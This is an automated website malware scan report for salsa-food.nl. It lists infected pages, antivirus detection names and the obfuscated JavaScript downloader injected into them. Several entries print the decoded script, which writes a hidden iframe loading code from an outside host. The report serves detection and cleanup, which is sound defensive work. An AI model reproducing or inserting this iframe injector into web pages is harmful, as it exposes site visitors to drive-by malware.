New scan:

Malware Scanner report for salsa-food.nl

Malicious/Suspicious/Total urls checked
10/0/15
10 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "salsa-food.nl" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=salsa-food.nl

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://salsa-food.nl/
200 OK
Content-Length: 174611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]...[11099 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/rw_common/themes/roland/javascript.js
200 OK
Content-Length: 14608
Content-Type: application/javascript
clean
http://salsa-food.nl/index.html
200 OK
Content-Length: 174611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]...[11099 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/producten.html
200 OK
Content-Length: 161849
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:

...[3288 bytes skipped]...
,76,24,192,24,92,120,24,116,8,72,4,164,80,0,168,0,0,156,136,148,68,0,80,144,24,76,80,136,44,76,0,24,192,24,92,120,24,116,8,64,64,64,36,152,184,68,88,80,180,0,4,44,80,0,104,40,80,88,80,180,0,164,128,28,56,52,44,108,52,88,80,144,24,148,152,36,28,24,116,176,120,112,4,52,140,140,80,180,36,188,76,136,40,36,144,72,116,8,64,64,124]
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://wormetal.com/count29.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://wormetal.com/count29.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
if (document.getElementsByTagNa
...[700 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../rw_common/themes/roland/javascript.js
200 OK
Content-Length: 14608
Content-Type: application/javascript
clean
http://salsa-food.nl/producten/../index.html
200 OK
Content-Length: 174611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]...[11099 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../producten/producten.html
200 OK
Content-Length: 161849
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:

...[3288 bytes skipped]...
,76,24,192,24,92,120,24,116,8,72,4,164,80,0,168,0,0,156,136,148,68,0,80,144,24,76,80,136,44,76,0,24,192,24,92,120,24,116,8,64,64,64,36,152,184,68,88,80,180,0,4,44,80,0,104,40,80,88,80,180,0,164,128,28,56,52,44,108,52,88,80,144,24,148,152,36,28,24,116,176,120,112,4,52,140,140,80,180,36,188,76,136,40,36,144,72,116,8,64,64,124]
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://wormetal.com/count29.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://wormetal.com/count29.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
if (document.getElementsByTagNa
...[700 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../producten/../rw_common/themes/roland/javascript.js
200 OK
Content-Length: 14608
Content-Type: application/javascript
clean
http://salsa-food.nl/producten/../producten/../index.html
200 OK
Content-Length: 174611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]...[11099 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../producten/../producten/producten.html
200 OK
Content-Length: 161849
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:

...[3288 bytes skipped]...
,76,24,192,24,92,120,24,116,8,72,4,164,80,0,168,0,0,156,136,148,68,0,80,144,24,76,80,136,44,76,0,24,192,24,92,120,24,116,8,64,64,64,36,152,184,68,88,80,180,0,4,44,80,0,104,40,80,88,80,180,0,164,128,28,56,52,44,108,52,88,80,144,24,148,152,36,28,24,116,176,120,112,4,52,140,140,80,180,36,188,76,136,40,36,144,72,116,8,64,64,124]
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://wormetal.com/count29.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://wormetal.com/count29.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
if (document.getElementsByTagNa
...[700 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../producten/../producten/../rw_common/themes/roland/javascript.js
200 OK
Content-Length: 14608
Content-Type: application/javascript
clean
http://salsa-food.nl/producten/../producten/../producten/../index.html
200 OK
Content-Length: 174611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]...[11099 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../producten/../producten/../producten/producten.html
200 OK
Content-Length: 161849
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:

...[3288 bytes skipped]...
,76,24,192,24,92,120,24,116,8,72,4,164,80,0,168,0,0,156,136,148,68,0,80,144,24,76,80,136,44,76,0,24,192,24,92,120,24,116,8,64,64,64,36,152,184,68,88,80,180,0,4,44,80,0,104,40,80,88,80,180,0,164,128,28,56,52,44,108,52,88,80,144,24,148,152,36,28,24,116,176,120,112,4,52,140,140,80,180,36,188,76,136,40,36,144,72,116,8,64,64,124]
if (document.getElementsByTagName('body')[0]){ iframer(); } else { document.write("<iframe src='http://wormetal.com/count29.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>"); } function iframer(){ var f = document.createElement('iframe');f.setAttribute('src','http://wormetal.com/count29.php');f.style.visibility='hidden';f.style.position='absolute';f.style.left='0';f.style.top='0';f.setAttribute('width','10');f.setAttribute('height','10'); document.getElementsByTagName('body')[0].appendChild(f); }
if (document.getElementsByTagNa
...[700 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI

http://salsa-food.nl/producten/../producten/../producten/../producten/../rw_common/themes/roland/javascript.js
200 OK
Content-Length: 14608
Content-Type: application/javascript
clean
http://salsa-food.nl/producten/../producten/../producten/../producten/../index.html
200 OK
Content-Length: 174611
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var WnmaQ={YYSXc:function(){l='';var v=function(){};function nB(){};var g = new Date(2011, 10, 12, 10, 42, 57);this.mS="mS";var s=false;this.zN=false;var u="";var o = g.getMonth();var r = "from" + g.getMonth() + "e";function t(){};d='';r = r.replace(10, "CharCod");a="";this.bX=''; var z=null;var aY=false;var f=function(){};var i=document.styleSheets;zA="";var x=false;for(var gP=0;gP < i.length;gP++){this.tT=false;var fU="fU";this.nT=62782;var jC=''
...[1218 bytes skipped]...

Decoded script:


asdas
asdas
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]
n[i]...[11099 bytes skipped]...

Antivirus reports:

AntiVir
JS/StyleSheeter.A
Avast
JS:Agent-AYD [Trj]
Antiy-AVL
Trojan/JS.StyleSheeter
Ikarus
Trojan-Downloader.JS.StyleSheeter
nProtect
Trojan.JS.Downloader.BJI
TrendMicro-HouseCall
TROJ_GEN.RCBH1HL
Emsisoft
Trojan.JS.Downloader.BJI (B)
Comodo
UnclassifiedMalware
Kaspersky
Trojan-Downloader.JS.StyleSheeter.a
Microsoft
VirTool:JS/Obfuscator.DN
MicroWorld-eScan
Trojan.JS.Downloader.BJI
Fortinet
JS/StyleSheeter.A!tr.dldr
NANO-Antivirus
Trojan.Script.StyleSheeter.bsqsy
F-Secure
Trojan.JS.Downloader.BJI
VIPRE
Trojan.JS.Obfuscator.m (v)
F-Prot
JS/IFrame.IC.gen
AVG
HTML/Framer
Norman
Iframe.EA
GData
Trojan.JS.Downloader.BJI
Commtouch
JS/IFrame.IC.gen
BitDefender
Trojan.JS.Downloader.BJI


Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: salsa-food.nl

Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 07 Jun 2014 20:17:16 GMT
Accept-Ranges: bytes
ETag: "1c8034-2aa13-4b6a83e6e0040"
Server: Apache/2.2.22 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 174611
Content-Type: text/html
Last-Modified: Mon, 16 Jan 2012 17:07:05 GMT

...174611 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: salsa-food.nl
Referer: http://www.google.com/search?q=salsa-food.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.